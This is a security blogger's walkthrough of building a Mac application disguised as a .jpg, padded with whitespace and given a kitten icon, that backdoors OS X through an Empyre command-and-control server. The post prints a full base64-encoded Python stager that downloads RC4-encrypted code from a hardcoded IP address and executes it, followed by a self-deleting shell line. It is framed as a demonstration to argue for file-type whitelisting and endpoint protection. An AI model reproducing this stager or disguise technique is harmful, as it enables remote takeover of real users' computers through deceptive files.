Computers are easy Computers have been made easy, easy to use so more can be sold and so more can be achieved, and like everything lately that means success and exploitation.
When was the last time you checked the permissions of a file? Right? Me too, I'm busy also, the inherent trust we give the files on our computer is because ... it doesn't usually lead to a compromise, if I don't scrutinise every file that has come from an untrusted network or external volume, yeah, we all have an acceptable risk policy that's pretty much finger in the air + how paranoid I am on that day or like some friends of mine (non-security friends) simply don't care, they know they have viruses/infection but they have no time to fix it or don't want to pay just yet, and are happy sharing their systems with bad guys/botnets/whatever
I've been playing around trying to create a misleading file this one is for the Mac, I'm going to walk through how it was made, what it does and what the considerations are (and caveats)in a bid to show readers that essentially, if you aren't whitelisting, filetypes at your mail server, ingress and volume access you will always have trouble ... and that's fine if that's the acceptable risk
Creating a .JPG (cough)
That will backdoor a OS X
- Virtual Private Server (for C2C, I will use Digital Ocean)
- Empyre (Python version of Empire, More Info here)
- A Mac (to prepare the '.jpg')
- Thumbnail Creation Software (you can do this without commercial software I believe but it's changed and as I said, I'm busy)
- Automator to wrap it up
There are a SO many ways to create nasty files and we will get to that, but this is just one of them, so keep that in mind
We need to create a Listener for the payload to connect back too:
Although it says Peggy, I later renamed it to Kittyjpg
Next we need Empyre to generate it's stager code to call back it it's C2C (the VPS)
we will use a bash script invoking python via automators Library > Utilities > run Shell Script
It looks like this:
echo "import sys,base64;exec(base64.b64decode('QUdjUEd3a255ZEw9J0hpaUVXbHducycKaW1wb3J0IHN5cywgdXJsbGliMjtvPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bc3lzLnZlcnNpb25faW5mb1swXV0sZnJvbWxpc3Q9WydidWlsZF9vcGVuZXInXSkuYnVpbGRfb3BlbmVyKCk7VUE9J01vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwLjExOyBydjo0NS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzQ1LjAnO28uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JyxVQSldO2E9by5vcGVuKCdodHRwOi8vMTM4LjY4LjEzMS4yMzM6ODA4MC9pbmRleC5hc3AnKS5yZWFkKCk7a2V5PSd5RyZbLz8oKXtaOzBWU3BXIVgrQ3JfNGFEc2RLI103VCc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSk='));" | python &
rm -f "$0"
and if we debase64 it, it will tell us what it's doing:
Next we need to test that it's working:
as we can see the agent has connected and is active, we have a backdoor from the code, next we need to bake it into something convincing, or click worthy...
We will create an
.app using Utilities and Run Shell Script
Save, with a ton of white space so it looks like this:
bg.jpg .app from the terminal it might look like this depending on how much space you give it:
and from View 1 of 4 available views on the Mac it looks like this ...
we need to give it an icon
oh yeah, I went there, cute kitten, suckers!
now the payload looks like this in the 4 available OS X Views :
there are some concerns here that a sharp mind will identify in view 2,3 and 4 but generally, looks pretty good.
lets give it a spin:
Click for demo
Obviously, not the finest work, I wouldn't expect this from state sponsored attacks haha, but just a demonstration
reinforcing the gateway file type whitelists (by extension) and usb lock down / end point protection message - it's genuinely not fair to blame users, best leave it up to computers to decide what is and isn't what it appears to be, they have more time to do it and it's what they are for.
I chose OS X because people often associate OS X as less of a victim, attackers have something for everything when it comes to attack surfaces now days, but the majority of success is within phishing and having files executed on behalf of the bad guy/girl.
there are SO many filetypes we need to be careful of, well, we need to protect end users from, best not to afford them the chance to fail.